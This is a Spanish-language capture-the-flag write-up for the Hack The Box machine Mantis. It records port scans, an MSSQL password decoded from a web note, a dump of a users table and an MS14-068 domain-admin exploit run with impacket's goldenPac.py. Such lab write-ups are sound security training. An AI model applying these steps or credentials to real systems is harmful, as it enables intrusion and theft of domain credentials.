# MANTIS ## Enumeración ### Nmap ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# nmap -sS -Pn --min-rate 5000 -p- 10.10.10.52 -oG allPorts Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-22 22:37 -05 Nmap scan report for 10.10.10.52 Host is up (0.26s latency). Not shown: 65508 closed tcp ports (reset) PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 1337/tcp open waste 1433/tcp open ms-sql-s 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5722/tcp open msdfsr 8080/tcp open http-proxy 9389/tcp open adws 47001/tcp open winrm 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49157/tcp open unknown 49158/tcp open unknown 49164/tcp open unknown 49166/tcp open unknown 49171/tcp open unknown 50255/tcp open unknown ``` ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# nmap -sCV --min-rate 5000 -p53,88,135,139,389,445,464,593,636,1337,1433,3268,3269,5722,8080,9389,47001,49152,49153,49154,49155,49157,49158,49164,49166,49171,50255 10.10.10.52 -oN targeted Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-22 22:38 -05 Nmap scan report for 10.10.10.52 Host is up (0.26s latency). PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-02-23 03:38:27Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB) 464/tcp open tcpwrapped 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 1337/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM |_ssl-date: 2022-02-23T03:39:43+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2022-02-23T03:15:32 |_Not valid after: 2052-02-23T03:15:32 | ms-sql-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: MANTIS | DNS_Domain_Name: htb.local | DNS_Computer_Name: mantis.htb.local |_ Product_Version: 6.1.7601 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5722/tcp open msrpc Microsoft Windows RPC 8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Microsoft-IIS/7.5 |_http-title: Tossed Salad - Blog 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49164/tcp open msrpc Microsoft Windows RPC 49166/tcp open msrpc Microsoft Windows RPC 49171/tcp open msrpc Microsoft Windows RPC 50255/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000 |_ssl-date: 2022-02-23T03:39:43+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2022-02-23T03:15:32 |_Not valid after: 2052-02-23T03:15:32 | ms-sql-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: MANTIS | DNS_Domain_Name: htb.local | DNS_Computer_Name: mantis.htb.local |_ Product_Version: 6.1.7601 Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results: | smb-os-discovery: | OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 | Computer name: mantis | NetBIOS computer name: MANTIS\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: mantis.htb.local |_ System time: 2022-02-22T22:39:29-05:00 | ms-sql-info: | 10.10.10.52:1433: | Version: | name: Microsoft SQL Server 2014 RTM | number: 12.00.2000.00 | Product: Microsoft SQL Server 2014 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | smb2-time: | date: 2022-02-23T03:39:32 |_ start_date: 2022-02-23T03:15:05 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.1: |_ Message signing enabled and required |_clock-skew: mean: 42m52s, deviation: 1h53m24s, median: 0s ``` Reconocimiento del equipo: ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# crackmapexec smb 10.10.10.52 SMB 10.10.10.52 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True) ``` ### rpcclient Accediendo al servicio con una sesión nula pero no se tienen privilegios: ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# rpcclient -U "" 10.10.10.52 -N rpcclient $> enumdomusers result was NT_STATUS_ACCESS_DENIED ``` ### smb Intentando listar recursos y entablar un conexión por SMB con el usuario `anonymous` : ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# smbmap -H 10.10.10.52 -u '' [+] IP: 10.10.10.52:445 Name: 10.10.10.52 ``` ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# smbclient -L //10.10.10.52/ -N Anonymous login successful Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` ![](https://i.imgur.com/sjDy6AA.png) ### Web - HTTP ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# wfuzz -c --hc=404 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 'http://10.10.10.52:1337/FUZZ' ``` Se encuentra el recurso `http://10.10.10.52:1337/secure_notes` `301 1 L 10 W 160 Ch "secure_notes"` ![](https://i.imgur.com/OEMzHjw.png) ![](https://i.imgur.com/A0bR9ZS.png) ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d | xxd -r -ps m$$ql_S@_P@ssW0rd! ``` ## MSSQL Se tiene el servicio MSSQL abierto en el puerto 1443 y las credenciales `admin:m$$ql_S@_P@ssW0rd!`. Validando las crendenciales: ``` ┌──(root💀kali)-[/home/cr4y0/Descargas/dbeaver/dbeaver] └─# crackmapexec mssql 10.10.10.52 -u 'admin' -p 'm$$ql_S@_P@ssW0rd!' --local-auth MSSQL 10.10.10.52 1433 MANTIS [*] Windows 6.1 Build 7601 (name:MANTIS) (domain:MANTIS) MSSQL 10.10.10.52 1433 MANTIS [+] admin:m$$ql_S@_P@ssW0rd! ``` Se establece una conexión con `mssqlclient.py` al servicio MSSQL: ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# /opt/impacket/examples/mssqlclient.py htb.local/'admin':'m$$ql_S@_P@ssW0rd!'@10.10.10.52 ``` ![](https://i.imgur.com/z8evuPA.png) ### Mssqclient #### Querys Se obtiene las bases de datos: `SELECT name FROM master..sysdatabases;` ``` master tempdb model msdb orcharddb ``` Se obtienen las tablas de la base de datos `orcharddb`: ``` SQL> SELECT TABLE_NAME FROM orcharddb.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'; ``` ![](https://i.imgur.com/wz05tfw.png) `blog_Orchard_Users_UserPartRecord` Se selecciona la base de datos `orcharddb`: ``` SQL> USE orcharddb; ``` Se selecciona toda la información de la tabla `blog_Orchard_Users_UserPartRecord`: ``` SQL> SELECT * FROM blog_Orchard_Users_UserPartRecord; ``` ### sqsh ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MANTIS] └─# sqsh -U 'admin' -S 10.10.10.52 sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp This is free software with ABSOLUTELY NO WARRANTY For more information type '\warranty' Password: 1> USE orcharddb; 2> go 1> SELECT * FROM blog_Orchard_Users_UserPartRecord; 2> go -m html > index.html ``` ![](https://i.imgur.com/5Nntipi.png) ### dbeaver La herramienta `dbeaver` brinda una GUI para la visualización y conexión al servicio MSSQL: Estableciendo una conexión: ![](https://i.imgur.com/PwPHEl6.png) Visualizando la información de la tabla `blog_Orchard_Users_UserPartRecord`: ![](https://i.imgur.com/FdNoSER.png) No se tiene permisos para ejecutar en la base de datos: ![](https://i.imgur.com/uX9hbac.png) ![](https://i.imgur.com/nUKiGfP.png) ## Kerberos - 88 Cuando Kerberos está activo, se suele probar un ataque "Vulnerability en Kerberos" MS14-068 Básicamente, es una vulnerabilidad crítica en los DC de Windows que permite a un usuario simple obtener un boleto dorado sin ser administrador. Con ese ticket, básicamente soy un administrador de dominio. La vulnerabilidad consiste en que un atacante logra modificar el token de inicio de sesión de usuario de dominio válido agregando una declaración falsa de que un usuario es miembro de los administradores del dominio. Cuando un usuario inicia sesión con credenciales de dominio por primera vez, el controlador de dominio lo que hace es validar el nombre de usuario y la contraseña, luego el DC enumera las restricciones de inicio de sesión y el grupo de usuarios a los que pertenece. Entonces se crea un Token de Inicio de sesión de domnio(TGT) y se le proporciona al usuario. Uno de los beneficios que tiene kerberos es que el usuario no tiene que volver a autenticarse en el controlador del dominio. Solo presenta el TokenDeInicio de Session(TGT) al DC y recibe un token de acceso a Recursos(TGS). Los tickets kerberos firmados por un DC en la red son confiables. ``` ┌──(root💀kali)-[/home/…/Escritorio/HTB/MANTIS/bloodhound] └─# /opt/impacket/examples/goldenPac.py htb.local/'james':'J@m3s_P@ssW0rd!'@mantis.htb.local ``` ![](https://i.imgur.com/g9f1sJE.png) #### Sol2(No concretado) Agregaré el controlador de dominio a mi `/etc/hosts`: ![](https://i.imgur.com/I7m4geA.png) Agregue Mantis como un servidor DNS en `/etc/resolv.conf`: ![](https://i.imgur.com/8irzv5G.png) Para verificar la hora remota y asegurarme de que esté dentro de los cinco minutos de la hora de mi anfitrión. ~~~ rdate -n 10.10.10.52 -v ~~~ ![](https://i.imgur.com/8YyETn4.png) Generar ticket de Kerberos Primero probaré esta configuración e intentaré generar un ticket de Kerberos: ![](https://i.imgur.com/MXkHOrH.png) ![](https://i.imgur.com/1Ha5pgD.png) ![](https://i.imgur.com/ybp2WzG.png) ~~~ james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1) ~~~ https://forum.hackthebox.com/t/mantis-write-up-by-alamot/458 https://0xdf.gitlab.io/2020/09/03/htb-mantis.html